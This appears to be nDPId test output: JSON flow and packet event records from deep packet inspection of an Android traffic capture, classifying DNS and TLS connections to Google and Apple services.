00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871881,"flow_last_seen":1582454871881,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871881,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871829,"flow_last_seen":1582454871890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871890,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871839,"flow_last_seen":1582454871911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871911,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871814,"flow_last_seen":1582454871913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1582454871913,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871829,"flow_last_seen":1582454871890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871890,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871839,"flow_last_seen":1582454871911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871911,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871814,"flow_last_seen":1582454871913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1582454871913,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1582454871920,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1582454871920,"pkt":"TGr2n\/YnxiwDYGpkCABFAABUFXQAAEAR38PAqAIBwKgCEAA1m1AAQNQ0uKWBgAABAAEAAAAAB2FuZHJvaWQKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAARcABKzZFgo="}
00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454871920,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.10"}}
00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":447,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871829,"flow_last_seen":1582454871933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871933,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871947,"flow_last_seen":1582454871947,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871947,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1582454871947,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871947,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8i1NAAEAGKc3AqAIQrNkWCq1WAbtFj7zOAAAAAKAC\/\/\/ZVgAAAgQFtAQCCAr\/\/zedAAAAAAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1582454871972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871972,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8OOwAAHYGhjSs2RYKwKgCEAG7rVbtvX7+RY+8z6AS6yDuawAAAgQFZAQCCAq7R9gE\/\/83nQEDAwg="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1582454871974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871974,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0i1RAAEAGKdTAqAIQrNkWCq1WAbtFj7zP7b1+\/4AQAVcGrAAAAQEICv\/\/N6S7R9gE"}
01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871947,"flow_last_seen":1582454872014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872014,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872015,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"semanticlocation-pa.googleapis.com","ja3":"33490b1d5377580b19f7f9b5849d7991","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":447,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871829,"flow_last_seen":1582454871933,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871933,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871947,"flow_last_seen":1582454871947,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871947,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1582454871947,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871947,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8i1NAAEAGKc3AqAIQrNkWCq1WAbtFj7zOAAAAAKAC\/\/\/ZVgAAAgQFtAQCCAr\/\/zedAAAAAAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1582454871972,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871972,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8OOwAAHYGhjSs2RYKwKgCEAG7rVbtvX7+RY+8z6AS6yDuawAAAgQFZAQCCAq7R9gE\/\/83nQEDAwg="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1582454871974,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871974,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0i1RAAEAGKdTAqAIQrNkWCq1WAbtFj7zP7b1+\/4AQAVcGrAAAAQEICv\/\/N6S7R9gE"}
01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871947,"flow_last_seen":1582454872014,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872014,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872015,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"semanticlocation-pa.googleapis.com","ja3":"33490b1d5377580b19f7f9b5849d7991","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872021,"flow_last_seen":1582454872021,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454872021,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1582454872021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454872021,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrFBAAEARCPrAqAIQwKgCAdv4ADUALYKcD\/4BAAABAAAAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAQ=="}
00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872021,"flow_last_seen":1582454872021,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454872021,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1582454872022,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454872022,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRBMwAAEAR8G7AqAIBwKgCEAA12\/gAPTZ5D\/6BgAABAAEAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAJMABKzZFEw="}
00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872022,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872031,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454872031,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8+JhAAEAGvkXAqAIQrNkUTKqEAbsc\/M8rAAAAAKAC\/\/\/0BgAAAgQFtAQCCAr\/\/zezAAAAAAEDAwg="}
01076{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872031,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1582454872031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454872031,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8+JhAAEAGvkXAqAIQrNkUTKqEAbsc\/M8rAAAAAKAC\/\/\/0BgAAAgQFtAQCCAr\/\/zezAAAAAAEDAwg="}
